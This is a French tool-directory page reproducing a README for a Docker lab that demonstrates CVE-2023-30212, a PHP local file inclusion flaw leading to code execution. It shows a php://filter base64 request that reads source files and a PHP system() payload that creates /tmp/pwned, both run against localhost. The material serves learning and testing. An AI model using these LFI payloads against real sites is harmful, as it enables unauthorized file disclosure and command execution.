Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2023-30212 — PoC pour CVE-2023-30212 utilisant Docker | Kitploit
Outils/GitHubGitHub/sungmin20/cve-2023-30212
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC pour CVE-2023-30212 utilisant Docker

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-2023-30212

PoC pour CVE-2023-30212 utilisant Docker

Mise en place de l'environnement CVE-2023-30212 et rapport PoC

📌 Aperçu

Ce rapport décrit la configuration manuelle d'un environnement web vulnérable basé sur Docker pour la vulnérabilité CVE-2023-30212, absente de Vulhub, ainsi que la validation de cette vulnérabilité via un PoC.

  • Numéro CVE : CVE-2023-30212
  • Description de la vulnérabilité : Possibilité d'exécution de code à distance via une LFI (Local File Inclusion) PHP
  • Difficulté : Avancée (configuration d'un environnement absent de Vulhub)

🔧 Configuration de l'environnement

1. Configuration du Dockerfile et de docker-compose

  • Image de base : php:8.1-apache
  • Copie de vulnerable.php et malicious.php dans le répertoire
---
Télécharger l’outil
/var/www/html
  • Accès externe possible via le port 8088 build Docker
  • 2. Description des principaux fichiers

    FichierDescription
    vulnerable.phpFichier PHP contenant la vulnérabilité LFI
    malicious.phpFichier PHP malveillant exécutant des commandes système
    docker-compose.ymlFichier de configuration pour l'orchestration des conteneurs
    DockerfileFichier de configuration pour la création de l'image Docker
    image
    image
    image
    image

    🚀 Déroulement de l'exploitation de la vulnérabilité (PoC)

    1. Lancement du conteneur

    root@kitploit:~
    docker-compose up -d
    

    Nom du conteneur : cve-2023-30212-cve-lfi-1

    Le serveur Apache est lancé et accessible à l'adresse http://localhost:8088

    1. Consultation du code source du fichier malveillant via la LFI Appelez l'URL ci-dessous pour consulter le contenu de malicious.php encodé en base64 :
    root@kitploit:~
    http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
    
    base64

    Le décodage du résultat révèle le code PHP suivant :

    root@kitploit:~
    <?php system("touch /tmp/pwned"); ?>
    
    image
    1. Exécution de la commande et vérification du résultat Appelez l'URL ci-dessous pour exécuter réellement la commande :
    root@kitploit:~
    http://localhost:8088/malicious.php
    

    Après l'exécution de la commande, le fichier /tmp/pwned doit être créé.

    root@kitploit:~
    docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
    

    Si le fichier pwned est présent dans les résultats, l'exploitation a réussi.

    fichier pwned

    Résumé des résultats

    Consultation et décodage réussis du contenu du fichier malveillant via la vulnérabilité LFI basée sur php://filter

    Exécution réussie de commandes arbitraires via l'appel du fichier PHP malveillant contenant la fonction system()

    Validation du PoC confirmée par la création du fichier /tmp/pwned